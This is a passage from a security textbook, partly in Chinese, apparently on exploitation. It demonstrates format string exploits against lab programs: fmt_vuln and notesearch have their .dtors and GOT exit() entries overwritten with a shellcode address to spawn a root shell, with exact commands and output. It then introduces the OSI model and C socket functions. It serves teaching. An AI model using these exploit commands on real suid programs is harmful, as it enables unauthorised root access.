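To see why the bytes e8 83 04 08 in the dump correspond to the address 0x080483e8, the little-endian byte sequence can be reassembled by hand. The function name le32_to_value() is a hypothetical one chosen for this sketch.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: rebuilds a 32-bit value from four bytes stored in
 * little-endian order, which is how objdump -s shows them on x86. */
uint32_t le32_to_value(const unsigned char bytes[4]) {
   assert(bytes != 0);
   return (uint32_t)bytes[0]
        | ((uint32_t)bytes[1] << 8)
        | ((uint32_t)bytes[2] << 16)
        | ((uint32_t)bytes[3] << 24);
}
```

Feeding it the four bytes e8, 83, 04, 08 in that order gives 0x080483e8, the address nm reported for cleanup().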

关于 .dtors 部分的另一个有趣细节是它是可写的。通过显示 .dtors 部分未标记为 READONLY，对象转储将验证这一点。

reader@hacking:~/booksrc $ objdump -h ./dtors_sample

./dtors_sample:     file format elf32-i386

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .interp       00000013  08048114  08048114  00000114  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  1 .note.ABI-tag 00000020  08048128  08048128  00000128  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .hash         0000002c  08048148  08048148  00000148  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .dynsym       00000060  08048174  08048174  00000174  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .dynstr       00000051  080481d4  080481d4  000001d4  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .gnu.version  0000000c  08048226  08048226  00000226  2**1
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  6 .gnu.version_r 00000020  08048234  08048234  00000234  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 .rel.dyn      00000008  08048254  08048254  00000254  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  8 .rel.plt      00000020  0804825c  0804825c  0000025c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  9 .init         00000017  0804827c  0804827c  0000027c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 10 .plt          00000050  08048294  08048294  00000294  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         000001c0  080482f0  080482f0  000002f0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  080484b0  080484b0  000004b0  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       000000bf  080484e0  080484e0  000004e0  2**5
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame     00000004  080485a0  080485a0  000005a0  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 15 .ctors        00000008  080495a4  080495a4  000005a4  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dtors        0000000c  080495ac  080495ac  000005ac  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .jcr          00000004  080495b8  080495b8  000005b8  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic      000000c8  080495bc  080495bc  000005bc  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got          00000004  08049684  08049684  00000684  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt      0000001c  08049688  08049688  00000688  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data         0000000c  080496a4  080496a4  000006a4  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss          00000004  080496b0  080496b0  000006b0  2**2
                  ALLOC
 23 .comment      0000012f  00000000  00000000  000006b0  2**0
                  CONTENTS, READONLY
 24 .debug_aranges 00000058  00000000  00000000  000007e0  2**3
                  CONTENTS, READONLY, DEBUGGING
 25 .debug_pubnames 00000025  00000000  00000000  00000838  2**0
                  CONTENTS, READONLY, DEBUGGING
 26 .debug_info   000001ad  00000000  00000000  0000085d  2**0
                  CONTENTS, READONLY, DEBUGGING
 27 .debug_abbrev 00000066  00000000  00000000  00000a0a  2**0
                  CONTENTS, READONLY, DEBUGGING
 28 .debug_line   0000013d  00000000  00000000  00000a70  2**0
                  CONTENTS, READONLY, DEBUGGING
 29 .debug_str    000000bb  00000000  00000000  00000bad  2**0
                  CONTENTS, READONLY, DEBUGGING
 30 .debug_ranges 00000048  00000000  00000000  00000c68  2**3
                  CONTENTS, READONLY, DEBUGGING 
reader@hacking:~/booksrc $

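Another interesting detail about the .dtors section is that it is included in all binaries compiled with the GNU C compiler, regardless of whether any functions were declared with the destructor attribute. This means that the vulnerable format string program, fmt_vuln.c, must have a .dtors section containing nothing. This can be inspected using nm and objdump.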

reader@hacking:~/booksrc $ nm ./fmt_vuln | grep DTOR
08049694 d __DTOR_END__
08049690 d __DTOR_LIST__
reader@hacking:~/booksrc $ objdump -s -j .dtors ./fmt_vuln

./fmt_vuln:     file format elf32-i386

Contents of section .dtors:
 8049690 ffffffff 00000000                    ........
reader@hacking:~/booksrc $

如此输出所示，__DTOR_LIST__ 和 __DTOR_END__ 之间的距离这次只有四个字节，这意味着它们之间没有其他地址。对象转储验证了这一点。

由于 .dtors 部分是可写的，如果将 0xffffffff 之后的地址覆盖为内存地址，程序退出时程序执行流程将被导向该地址。这将是指向 __DTOR_LIST__ 加四的地址，即 0x08049694（在这种情况下，这也恰好是 __DTOR_END__ 的地址）。

如果程序是 suid root，并且这个地址可以被覆盖，那么将有可能获得 root shell。

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln
SHELLCODE will be at 0xbffff9ec
reader@hacking:~/booksrc $

Shellcode 可以放入环境变量中，地址可以像往常一样预测。由于辅助程序 getenvaddr.c 和易受攻击的 fmt_vuln.c 程序的文件名长度相差两个字节，当 fmt_vuln.c 执行时，Shellcode 将位于 0xbffff9ec。这个地址只需使用格式字符串漏洞将其写入 .dtors 部分的 0x08049694（如下所示加粗）即可。下面的输出中使用了简短写入方法。

reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9ec - 0xbfff
$2 = 14829
(gdb) quit
reader@hacking:~/booksrc $ nm ./fmt_vuln | grep DTOR
`08049694` d __DTOR_END__
08049690 d __DTOR_LIST__
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x96\x04\x08\x94\x96\x04\x08")%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%14829x%5$hn
The wrong way to print user-controlled input:
????

                                                        b7fe75fc
[*] test_val @ 0x08049794 = -72 0xffffffb8
sh-3.2# whoami
root 
sh-3.2#

即使.dtors部分没有用0x00000000的空地址正确终止，shellcode 地址仍然被视为一个析构函数。当程序退出时，shellcode 将被调用，启动一个 root shell。

另一个 notesearch 漏洞

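In addition to the buffer overflow vulnerability, the notesearch program from Chapter 0x200 also suffers from a format string vulnerability. The vulnerable call is the printf(note_buffer) line highlighted in the code listing below.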

int print_notes(int fd, int uid, char *searchstring) {
   int note_length;
   char byte=0, note_buffer[100];

   note_length = find_user_note(fd, uid);
   if(note_length == -1)  // If end of file reached,
      return 0;           //   return 0.

   read(fd, note_buffer, note_length); // Read note data.
   note_buffer[note_length] = 0;       // Terminate the string.

   if(search_note(note_buffer, searchstring)) // If searchstring found,
      printf(note_buffer);                    //   print the note.
   return 1; 
}

此函数从文件中读取note_buffer并打印注释的内容，而不提供自己的格式字符串。虽然此缓冲区不能直接从命令行控制，但可以通过使用 notetaker 程序发送正确数据到文件并使用 notesearch 程序打开该注释来利用漏洞。在以下输出中，notetaker 程序用于创建 notes 以探测 notesearch 程序中的内存。这告诉我们第八个函数参数位于缓冲区的开始处。

reader@hacking:~/booksrc $ ./notetaker AAAA$(perl -e 'print "%x."x10')
[DEBUG] buffer   @ 0x804a008: 'AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ ./notesearch AAAA
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
AAAAbffff750.23.20435455.37303032.0.0.1.41414141.252e7825.78252e78.
-------[ end of note data ]-------
reader@hacking:~/booksrc $ ./notetaker BBBB%8\$x
[DEBUG] buffer   @ 0x804a008: 'BBBB%8$x'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ ./notesearch BBBB
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
BBBB42424242
-------[ end of note data ]------- 
reader@hacking:~/booksrc $
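For contrast with the vulnerable printf(note_buffer) call, the sketch below shows the usual way to treat user-controlled text purely as data: pass it as an argument to a fixed "%s" format. The function name format_note_safely() is hypothetical, and snprintf() is used instead of printf() only so that the result can be inspected in memory.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper: copies `note` into `out` as plain data. Because the
 * format string is the constant "%s", any format parameters inside `note`
 * (such as %x or %n) are copied literally and never interpreted. */
int format_note_safely(char *out, size_t out_size, const char *note) {
   assert(out != NULL && note != NULL && out_size > 0);
   return snprintf(out, out_size, "%s", note);
}
```

With this approach, a note such as BBBB%8$x comes out unchanged instead of leaking a value from the stack.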

现在已知内存的相对布局，利用攻击只需将注入的 shellcode 地址覆盖.dtors部分即可。

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9e8
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9e8 - 0xbfff
$2 = 14825
(gdb) quit
reader@hacking:~/booksrc $ nm ./notesearch | grep DTOR
08049c60 d __DTOR_END__
08049c5c d __DTOR_LIST__
reader@hacking:~/booksrc $ ./notetaker $(printf "\x62\x9c\x04\x08\x60\x9c\x04\x08")%49143x%8\$hn%14825x%9\$hn
[DEBUG] buffer   @ 0x804a008: 'b?`?%49143x%8$hn%14825x%9$hn'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ ./notesearch 49143x
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999

                                        21
-------[ end of note data ]-------
sh-3.2# whoami
root
sh-3.2#

覆写全局偏移表

由于程序可能多次使用共享库中的函数，因此有一个表格来引用所有函数是有用的。编译程序中的另一个特殊部分用于此目的——程序链接表（PLT）。

该部分由许多跳转指令组成，每个指令对应一个函数的地址。它就像一个跳板——每次需要调用共享函数时，控制权将通过 PLT 传递。

An object dump disassembling the PLT section of the vulnerable format string program (fmt_vuln.c) shows these jump instructions:

reader@hacking:~/booksrc $ objdump -d -j .plt ./fmt_vuln

./fmt_vuln:     file format elf32-i386

Disassembly of section .plt:

080482b8 <__gmon_start__@plt-0x10>:
 80482b8:       ff 35 6c 97 04 08       pushl  0x804976c
 80482be:       ff 25 70 97 04 08       jmp    *0x8049770
 80482c4:       00 00                   add    %al,(%eax)
        ...

080482c8 <__gmon_start__@plt>:
 80482c8:       ff 25 74 97 04 08       jmp    *0x8049774
 80482ce:       68 00 00 00 00          push   $0x0
 80482d3:       e9 e0 ff ff ff          jmp    80482b8 <_init+0x18>

080482d8 <__libc_start_main@plt>:
 80482d8:       ff 25 78 97 04 08       jmp    *0x8049778
 80482de:       68 08 00 00 00          push   $0x8
 80482e3:       e9 d0 ff ff ff          jmp    80482b8 <_init+0x18>

080482e8 <strcpy@plt>:
 80482e8:       ff 25 7c 97 04 08       jmp    *0x804977c
 80482ee:       68 10 00 00 00          push   $0x10
 80482f3:       e9 c0 ff ff ff          jmp    80482b8 <_init+0x18>

080482f8 <printf@plt>:
 80482f8:       ff 25 80 97 04 08       jmp    *0x8049780
 80482fe:       68 18 00 00 00          push   $0x18
 8048303:       e9 b0 ff ff ff          jmp    80482b8 <_init+0x18>

08048308 <exit@plt>:
 8048308:       ff 25 84 97 04 08       jmp    *0x8049784
 804830e:       68 20 00 00 00          push   $0x20
 8048313:       e9 a0 ff ff ff          jmp    80482b8 <_init+0x18> 
reader@hacking:~/booksrc $

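One of these jump instructions is associated with the exit() function, which is called at the end of the program. If the jump instruction used for the exit() function can be manipulated to direct the execution flow into shellcode instead of the exit() function, a root shell will be spawned. Unfortunately, as shown below, the procedure linkage table is read-only.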

reader@hacking:~/booksrc $ objdump -h ./fmt_vuln | grep -A1 "\ .plt\ "
 10 .plt          00000060  080482b8  080482b8  000002b8  2**2 
                  CONTENTS, ALLOC, LOAD, READONLY, CODE

但更仔细地检查跳转指令（如下所示加粗）揭示它们并不是跳转到地址，而是跳转到地址的指针。例如，printf()函数的实际地址存储在内存地址0x08049780处的指针，而exit()函数的地址存储在0x08049784。

080482f8 <printf@plt>:
 80482f8:       ff 25 80 97 04 08       jmp     `*0x8049780`
 80482fe:       68 18 00 00 00          push   $0x18
 8048303:       e9 b0 ff ff ff          jmp    80482b8 <_init+0x18>

08048308 <exit@plt>:
 8048308:       ff 25 84 97 04 08       jmp     `*0x8049784`
 804830e:       68 20 00 00 00          push   $0x20 
 8048313:       e9 a0 ff ff ff          jmp    80482b8 <_init+0x18>

这些地址存在于另一个部分，称为全局偏移表（GOT），它是可写的。这些地址可以通过使用objdump显示二进制的动态重定位条目来直接获得。

reader@hacking:~/booksrc $ objdump -R ./fmt_vuln

./fmt_vuln:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049764 R_386_GLOB_DAT    __gmon_start__
08049774 R_386_JUMP_SLOT   __gmon_start__
08049778 R_386_JUMP_SLOT   __libc_start_main
0804977c R_386_JUMP_SLOT   strcpy
08049780 R_386_JUMP_SLOT   printf
`08049784 R_386_JUMP_SLOT   exit`

reader@hacking:~/booksrc $

这表明 exit() 函数的地址（如上图中加粗所示）位于 GOT 的 0x08049784。如果在此位置覆盖 shellcode 的地址，当程序认为它在调用 exit() 函数时，它应该调用 shellcode。
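The relationship between a read-only jump stub and a writable address slot can be modeled in plain C with a function pointer. This is only an analogy under stated assumptions: slot_table, call_through_slot(), and overwrite_slot() are hypothetical names, and the "overwrite" is an ordinary assignment standing in for the arbitrary write that a format string vulnerability provides.

```c
#include <assert.h>

typedef int (*handler_fn)(void);

/* Stand-ins for the real library function and for injected code. */
int real_exit_handler(void) { return 1; }
int injected_handler(void)  { return 2; }

/* A writable table of code addresses, playing the role of the GOT. */
static handler_fn slot_table[1] = { real_exit_handler };

/* Plays the role of the read-only PLT stub: it never changes, but it
 * jumps to whatever address the writable slot currently holds. */
int call_through_slot(void) {
   assert(slot_table[0] != 0);
   return slot_table[0]();
}

/* Stands in for an arbitrary memory write aimed at the slot. */
void overwrite_slot(handler_fn replacement) {
   slot_table[0] = replacement;
}
```

Before the overwrite, call_through_slot() reaches real_exit_handler(); afterward the same unchanged stub reaches injected_handler(), which is the effect the GOT overwrite relies on.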

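As usual, the shellcode is put in an environment variable, its actual location is predicted, and the format string vulnerability is used to write the value. In fact, the shellcode should still be located in the environment from before, meaning that the only thing that needs adjustment is the pair of target addresses at the start of the format string (eight bytes when short writes are used). The calculations for the %x format parameters are done once again for clarity. In the output below, the address of the shellcode (0xbffff9ec) is written into the GOT entry for the exit() function (0x08049784).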

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln
SHELLCODE will be at 0xbffff9ec
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9ec - 0xbfff
$2 = 14829
(gdb) quit
reader@hacking:~/booksrc $ objdump -R ./fmt_vuln

./fmt_vuln:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049764 R_386_GLOB_DAT    __gmon_start__
08049774 R_386_JUMP_SLOT   __gmon_start__
08049778 R_386_JUMP_SLOT   __libc_start_main
0804977c R_386_JUMP_SLOT   strcpy
08049780 R_386_JUMP_SLOT   printf 
08049784 R_386_JUMP_SLOT   exit

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x86\x97\x04\x08\x84\x97\x04\x08")%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%14829x%5$hn
The wrong way to print user-controlled input:
????

                                                         b7fe75fc
[*] test_val @ 0x08049794 = -72 0xffffffb8
sh-3.2# whoami
root 
sh-3.2#

当 fmt_vuln.c 尝试调用 exit() 函数时，exit() 函数的地址在 GOT 中查找，并通过 PLT 跳转。由于实际地址已被环境中的 shellcode 地址所替换，因此会启动一个 root shell。

重写 GOT 的另一个优点是，GOT 条目对每个二进制文件是固定的，因此具有相同二进制文件的不同系统将在同一地址处具有相同的 GOT 条目。

能够覆盖任何任意地址为利用提供了许多可能性。基本上，任何可写且包含指向程序执行流程的地址的内存部分都可以成为目标。

第 0x400 章。网络

通信和语言极大地增强了人类的能力。通过使用一种共同的语言，人类能够传递知识、协调行动和分享经验。同样，当程序能够通过网络与其他程序进行通信时，它们可以变得更为强大。网络浏览器的真正效用不在于程序本身，而在于其与 web 服务器通信的能力。

网络如此普遍，以至于有时人们认为这是理所当然的。许多应用程序，如电子邮件、网页和即时消息，都依赖于网络。每个应用程序都依赖于特定的网络协议，但每个协议都使用相同的通用网络传输方法。

许多人没有意识到网络协议本身存在漏洞。在本章中，你将学习如何使用套接字来网络化你的应用程序，以及如何处理常见的网络漏洞。

OSI 模型

当两台计算机相互交谈时，它们需要说同一种语言。这种语言的架构是通过 OSI 模型按层描述的。OSI 模型提供了标准，允许硬件，如路由器和防火墙，专注于与其相关的特定通信方面，而忽略其他方面。OSI 模型被分解为通信的概念层。这样，路由器和防火墙硬件可以专注于在较低层传递数据，忽略运行应用程序使用的较高层数据封装。以下为七个 OSI 层：

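Physical layer: This layer deals with the physical connection between two points. This is the lowest layer, whose primary role is communicating raw bit streams. This layer is also responsible for activating, maintaining, and deactivating these bit-stream communications.
Data-link layer: This layer deals with actually transferring data between two points. In contrast with the physical layer, which takes care of sending the raw bits, this layer provides high-level functions, such as error correction and flow control. This layer also provides procedures for activating, maintaining, and deactivating data-link connections.
Network layer: This layer works as a middle ground; its primary role is to pass information between the lower and the higher layers. It provides addressing and routing.
Transport layer: This layer provides transparent transfer of data between systems. By providing reliable data communication, this layer allows the higher layers to never worry about the reliability or cost-effectiveness of data transmission.
Session layer: This layer is responsible for establishing and maintaining connections between network applications.
Presentation layer: This layer is responsible for presenting the data to applications in a syntax or language they understand. This allows for things like encryption and data compression.
Application layer: This layer is concerned with keeping track of the requirements of the application.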

当数据通过这些协议层进行通信时，它被分成小块，称为数据包。每个数据包包含这些协议层的实现。从应用层开始，数据包将表示层包裹在数据周围，然后是会话层，再然后是传输层，以此类推。这个过程称为封装。每个封装层包含一个头部和一个主体。头部包含该层所需的协议信息，而主体包含该层的数据。一个层的主体包含之前封装的所有层的整个包，就像洋葱的皮或程序堆栈上找到的功能上下文一样。

例如，每次你浏览网页时，以太网电缆和卡组成物理层，负责将原始比特从电缆一端传输到另一端。下一层是数据链路层。在网页浏览器的例子中，以太网构成了这一层，它提供了局域网中以太网端口之间的低级通信。这个协议允许以太网端口之间的通信，但这些端口还没有 IP 地址。IP 地址的概念直到下一层，即网络层才存在。除了寻址之外，这一层还负责将数据从一个地址移动到另一个地址。这三个较低层共同能够将数据包从一个 IP 地址发送到另一个 IP 地址。下一层是传输层，对于网络流量来说是 TCP；它提供了一个无缝的双向套接字连接。术语TCP/IP描述了在传输层使用 TCP 和在网络层使用 IP。在这一层存在其他寻址方案；然而，你的网络流量可能使用 IP 版本 4（IPv4）。IP 版本 6（IPv6）也存在于这一层，具有完全不同的寻址方案。由于 IPv4 最常见，本书中的IP始终指 IPv4。

网络流量本身使用 HTTP（超文本传输协议）进行通信，这是 OSI 模型的顶层。当你浏览网页时，你网络上的网络浏览器正通过互联网与位于不同私有网络上的 web 服务器进行通信。当这种情况发生时，数据包被封装到物理层，然后传递给路由器。由于路由器不关心数据包中实际的内容，它只需要实现到网络层的协议。路由器将数据包发送到互联网，在那里它们到达另一个网络的路由器。然后，这个路由器将这个数据包封装成需要到达最终目的地的低层协议头部。这个过程在下面的插图中有展示。

图 0x400-1。

所有这些数据包封装构成了一个复杂的语言，互联网（以及其他类型的网络）上的主机使用它来相互通信。这些协议被编程到路由器、防火墙以及您的计算机操作系统中，以便它们可以通信。使用网络的应用程序，如网页浏览器和电子邮件客户端，需要与操作系统接口，该操作系统处理网络通信。由于操作系统负责网络封装的细节，编写网络程序只是使用操作系统的网络接口的问题。

套接字

网络套接字是通过操作系统执行网络通信的标准方式。套接字可以被视为连接的端点，就像操作员交换机上的一孔。但这些套接字只是程序员对上述 OSI 模型中所有繁琐细节的抽象处理。对于程序员来说，套接字可以用来在网络中发送或接收数据。这些数据在会话层（5）传输，位于下层（由操作系统处理）之上，下层负责路由。存在几种不同类型的套接字，它们决定了传输层（4）的结构。最常见的是流套接字和数据报套接字。

流套接字提供类似于打电话时的可靠双向通信。一方发起与另一方的连接，连接建立后，任何一方都可以与另一方通信。此外，还有即时的确认，表明您所说的话确实到达了目的地。流套接字使用一种称为传输控制协议（TCP）的标准通信协议，该协议存在于 OSI 模型的传输层（4）上。在计算机网络中，数据通常以称为数据包的块的形式传输。TCP 被设计成数据包将无错误且按顺序到达，就像您在电话中说话时，另一端接收到的单词顺序与您说话的顺序相同。Web 服务器、邮件服务器及其相应的客户端应用程序都使用 TCP 和流套接字进行通信。

另一种常见的套接字类型是数据报套接字。使用数据报套接字进行通信更像是邮寄信件而不是打电话。这种连接是单向的且不可靠的。如果你邮寄几封信，你不能确定它们是否按相同的顺序到达，甚至不能确定它们是否真的到达了目的地。邮政服务相当可靠；然而，互联网却不是。数据报套接字在传输层使用另一种标准协议 UDP 而不是 TCP。UDP 代表用户数据报协议，意味着它可以用来创建自定义协议。该协议非常基础且轻量级，其中内置了很少的安全保障。它不是一个真正的连接，而是一种从一点到另一点发送数据的基本方法。使用数据报套接字，协议中的开销非常小，但协议本身做得不多。如果你的程序需要确认数据包被另一端接收，另一端必须被编码为发送确认数据包。在某些情况下，数据包丢失是可以接受的。

数据报套接字和 UDP 常用于网络游戏和流媒体，因为开发者可以精确地定制他们的通信，而不需要 TCP 内置的开销。

Socket 函数

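In C, sockets behave a lot like files, since they use file descriptors to identify themselves. Sockets behave so much like files that you can actually use the read() and write() functions to receive and send data using socket file descriptors. However, there are several functions specifically designed to deal with sockets. These functions have their prototypes defined in /usr/include/sys/socket.h.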

socket(int domain, int type, int protocol)

Used to create a new socket; returns a file descriptor for the socket, or -1 on error.

connect(int fd, struct sockaddr *remote_host, socklen_t addr_length)

将套接字（由文件描述符 fd 描述）连接到远程主机。成功时返回 0，出错时返回 -1。

bind(int fd, struct sockaddr *local_addr, socklen_t addr_length)

将套接字绑定到本地地址，以便它可以监听传入的连接。成功时返回 0，出错时返回 -1。

listen(int fd, int backlog_queue_size)

监听传入的连接并将连接请求排队到 backlog_queue_size。成功时返回 0，出错时返回 -1。

accept(int fd, struct sockaddr *remote_host, socklen_t *addr_length)

在已绑定的套接字上接受传入的连接。远程主机的地址信息写入到 remote_host 结构中，实际地址结构的大小写入到 *addr_length。此函数返回一个新套接字文件描述符以标识已连接的套接字，或在出错时返回 -1。

send(int fd, void *buffer, size_t n, int flags)

从 *buffer 发送 n 字节到套接字 fd；返回发送的字节数或在出错时返回 -1。

recv(int fd, void *buffer, size_t n, int flags)

从套接字fd接收n字节到*buffer；返回接收的字节数或在出错时返回-1。

当使用socket()函数创建套接字时，必须指定套接字的域、类型和协议。域指的是套接字的协议族。套接字可以使用各种协议进行通信，从您浏览网页时使用的标准互联网协议到业余无线电协议 AX.25（当您成为一个巨大的极客时）。这些协议族在bits/socket.h中定义，该文件会自动从sys/socket.h中包含。

从`/usr/include/bits/socket.h`

/* Protocol families.  */
#define PF_UNSPEC 0 /* Unspecified.  */
#define PF_LOCAL  1 /* Local to host (pipes and file-domain).  */
#define PF_UNIX   PF_LOCAL /* Old BSD name for PF_LOCAL.  */
#define PF_FILE   PF_LOCAL /* Another nonstandard name for PF_LOCAL.  */
#define PF_INET   2 /* IP protocol family.  */
#define PF_AX25   3 /* Amateur Radio AX.25.  */
#define PF_IPX    4 /* Novell Internet Protocol.  */
#define PF_APPLETALK  5 /* Appletalk DDP.  */
#define PF_NETROM 6 /* Amateur radio NetROM.  */
#define PF_BRIDGE 7 /* Multiprotocol bridge.  */
#define PF_ATMPVC 8 /* ATM PVCs.  */
#define PF_X25    9 /* Reserved for X.25 project.  */
#define PF_INET6  10  /* IP version 6.  */
     ...

如前所述，存在几种类型的套接字，尽管流套接字和数据报套接字是最常用的。套接字类型也在bits/socket.h中定义。（上面代码中的/* comments */只是注释星号之间所有内容的另一种样式。）

从`/usr/include/bits/socket.h`

/* Types of sockets.  */
enum __socket_type
{
  SOCK_STREAM = 1,    /* Sequenced, reliable, connection-based byte streams.  */
#define SOCK_STREAM SOCK_STREAM
  SOCK_DGRAM = 2,   /* Connectionless, unreliable datagrams of fixed maximum length.  */
#define SOCK_DGRAM SOCK_DGRAM

  ...

socket()函数的最后一个参数是协议，几乎总是应该是0。规范允许在协议族内使用多个协议，因此此参数用于从族中选择一个协议。然而，在实践中，大多数协议族只有一个协议，这意味着通常应该将其设置为0；族枚举中的第一个和唯一协议。在我们这本书中，我们将使用套接字的所有内容都是这种情况，因此在我们的示例中，此参数始终是0。

套接字地址

许多套接字函数引用sockaddr结构来传递定义主机的地址信息。此结构也在bits/socket.h中定义，如下页所示。

从`/usr/include/bits/socket.h`

/* Get the definition of the macro to define the common sockaddr members.  */
#include <bits/sockaddr.h>

/* Structure describing a generic socket address. */
struct sockaddr
  {
    __SOCKADDR_COMMON (sa_);  /* Common data: address family and length.  */
    char sa_data[14];   /* Address data.  */
  };

SOCKADDR_COMMON宏在包含的bits/sockaddr.h文件中定义，这基本上相当于一个无符号短整型。此值定义了地址的地址族，其余的结构用于保存地址数据。由于套接字可以使用各种协议族进行通信，每个协议族都有其定义端点地址的方式，因此地址的定义也必须是可变的，取决于地址族。可能的地址族也在bits/socket.h中定义；它们通常直接转换为相应的协议族。

从`/usr/include/bits/socket.h`

/* Address families.  */
#define AF_UNSPEC PF_UNSPEC
#define AF_LOCAL  PF_LOCAL
#define AF_UNIX   PF_UNIX
#define AF_FILE   PF_FILE
#define AF_INET   PF_INET
#define AF_AX25   PF_AX25
#define AF_IPX    PF_IPX
#define AF_APPLETALK  PF_APPLETALK
#define AF_NETROM PF_NETROM
#define AF_BRIDGE PF_BRIDGE
#define AF_ATMPVC PF_ATMPVC
#define AF_X25    PF_X25
#define AF_INET6  PF_INET6
     ...

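Since an address can contain different types of information depending on the address family, there are several other address structures that contain, in the address data section, common elements from the sockaddr structure as well as information specific to the address family. These structures are also the same size, so they can be typecast to and from each other. This means that socket functions such as connect(), bind(), and accept() simply take a pointer to a sockaddr structure, which can in fact point to an address structure for IPv4, IPv6, or X.25. This allows the socket functions to operate on a variety of protocols.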

在这本书中，我们将处理互联网协议版本 4，即协议族 PF_INET，使用地址族 AF_INET。AF_INET 的并行套接字地址结构定义在 netinet/in.h 文件中。

来自 /usr/include/netinet/in.h

/* Structure describing an Internet socket address.  */
struct sockaddr_in
  {
    __SOCKADDR_COMMON (sin_);
    in_port_t sin_port;     /* Port number.  */
    struct in_addr sin_addr;    /* Internet address.  */

    /* Pad to size of 'struct sockaddr'.  */
    unsigned char sin_zero[sizeof (struct sockaddr) -
         __SOCKADDR_COMMON_SIZE -
         sizeof (in_port_t) -
         sizeof (struct in_addr)];
  };

结构体顶部的 SOCKADDR_COMMON 部分简单地是上面提到的无符号短整型，用于定义地址族。由于套接字端点地址由一个互联网地址和一个端口号组成，因此这些是结构体中的下两个值。端口号是一个 16 位的短整型，而用于互联网地址的 in_addr 结构体包含一个 32 位的数字。结构体的其余部分只是 8 个字节的填充，以填充完整的 sockaddr 结构体。这个空间没有用于任何东西，但必须保留，以便结构体可以相互类型转换。最终，套接字地址结构体看起来像这样：

图表 0x400-2。
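The size relationship between sockaddr_in and the generic sockaddr, and the typecast between them, can be checked with a short sketch. The helper names fill_ipv4_any() and as_generic() are hypothetical; the structures and constants come from the standard socket headers.

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Hypothetical helper: fills an IPv4 socket address for the given port on
 * any local interface. memset() also zeroes the sin_zero padding bytes. */
void fill_ipv4_any(struct sockaddr_in *addr, unsigned short port) {
   assert(addr != NULL);
   memset(addr, 0, sizeof(*addr));
   addr->sin_family = AF_INET;                /* address family */
   addr->sin_port = htons(port);              /* network byte order */
   addr->sin_addr.s_addr = htonl(INADDR_ANY); /* 0: any local address */
}

/* Hypothetical helper: views the IPv4 structure through the generic type,
 * the same cast that is used when calling bind() or connect(). */
const struct sockaddr *as_generic(const struct sockaddr_in *addr) {
   return (const struct sockaddr *)addr;
}
```

Because the padding makes both structures the same size, the family field read through the generic pointer is still AF_INET.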

网络字节序

